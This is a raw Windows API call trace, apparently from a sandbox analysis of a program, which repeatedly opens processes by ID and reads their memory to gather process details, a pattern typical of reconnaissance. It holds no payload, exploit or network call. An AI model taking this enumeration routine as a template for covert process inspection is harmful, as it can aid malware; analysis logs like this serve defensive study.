[0414.157] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.157] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.183] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x24c
[0414.183] GetLastError () returned 0x0
[0414.183] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.183] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.183] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.184] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.184] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.185] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.186] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.186] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] malloc (_Size=0x64) returned 0x2c0720
[0414.187] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2740, lpBuffer=0x2c0720, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.187] free (_Block=0x2c0720)
[0414.188] CloseHandle (hObject=0x24c) returned 1
[0414.189] _ui64tow (_Value=0xaa8, _Buffer="2392", _Radix=10) returned="2728"
[0414.194] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2728") returned 4
[0414.195] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.195] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x24c
[0414.219] GetLastError () returned 0x0
[0414.219] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x192900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.219] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1926e4, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.221] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.226] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.226] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.227] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x191ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.228] malloc (_Size=0x6a) returned 0x2c1680
[0414.228] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x192746, lpBuffer=0x2c1680, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.229] free (_Block=0x2c1680)
[0414.229] CloseHandle (hObject=0x24c) returned 1
[0414.230] _ui64tow (_Value=0xab4, _Buffer="2728", _Radix=10) returned="2740"
[0414.234] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2740") returned 4
[0414.236] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.236] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.262] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x24c
[0414.262] GetLastError () returned 0x0
[0414.262] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.262] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5728f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.263] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5726e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.264] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.265] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.265] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.265] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.266] malloc (_Size=0x64) returned 0x2c0720
[0414.266] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x572740, lpBuffer=0x2c0720, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.266] free (_Block=0x2c0720)
[0414.267] CloseHandle (hObject=0x24c) returned 1
[0414.268] _ui64tow (_Value=0xabc, _Buffer="2740", _Radix=10) returned="2748"
[0414.283] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2748") returned 4
[0414.284] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.284] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.307] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x24c
[0414.307] GetLastError () returned 0x0
[0414.307] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.307] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4126da, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.309] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.310] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x411ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.310] malloc (_Size=0x5a) returned 0x2c0720
[0414.310] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x41272c, lpBuffer=0x2c0720, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.311] free (_Block=0x2c0720)
[0414.311] CloseHandle (hObject=0x24c) returned 1
[0414.312] _ui64tow (_Value=0xac4, _Buffer="2748", _Radix=10) returned="2756"
[0414.318] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2756") returned 4
[0414.319] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.319] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.386] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac4) returned 0x24c
[0414.386] GetLastError () returned 0x0
[0414.386] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.386] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.386] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.387] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x422920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.387] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4226f4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.388] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.389] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.389] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.389] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.390] malloc (_Size=0x70) returned 0x2c1680
[0414.390] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x42275c, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.390] free (_Block=0x2c1680)
[0414.391] CloseHandle (hObject=0x24c) returned 1
[0414.391] _ui64tow (_Value=0xacc, _Buffer="2756", _Radix=10) returned="2764"
[0414.397] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2764") returned 4
[0414.398] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.398] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.421] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x24c
[0414.421] GetLastError () returned 0x0
[0414.421] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.421] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.421] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.422] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb2920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.422] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb26e8, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.423] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.424] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.424] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.424] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.424] malloc (_Size=0x74) returned 0x2c1680
[0414.425] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb2754, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.425] free (_Block=0x2c1680)
[0414.425] CloseHandle (hObject=0x24c) returned 1
[0414.471] _ui64tow (_Value=0xad4, _Buffer="2764", _Radix=10) returned="2772"
[0414.476] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2772") returned 4
[0414.477] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.477] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.500] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x24c
[0414.500] GetLastError () returned 0x0
[0414.500] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.500] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x252910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.501] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2526e4, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.502] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.503] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.503] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.503] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.552] malloc (_Size=0x6e) returned 0x2c1680
[0414.552] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x25274a, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.552] free (_Block=0x2c1680)
[0414.553] CloseHandle (hObject=0x24c) returned 1
[0414.554] _ui64tow (_Value=0xadc, _Buffer="2772", _Radix=10) returned="2780"
[0414.558] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2780") returned 4
[0414.560] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.560] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x24c
[0414.601] GetLastError () returned 0x0
[0414.601] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3528e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3526e0, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.602] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.604] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] malloc (_Size=0x5e) returned 0x2c0790
[0414.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x352736, lpBuffer=0x2c0790, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0414.604] free (_Block=0x2c0790)
[0414.605] CloseHandle (hObject=0x24c) returned 1
[0414.760] _ui64tow (_Value=0xab0, _Buffer="2780", _Radix=10) returned="2736"
[0414.764] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2736") returned 4
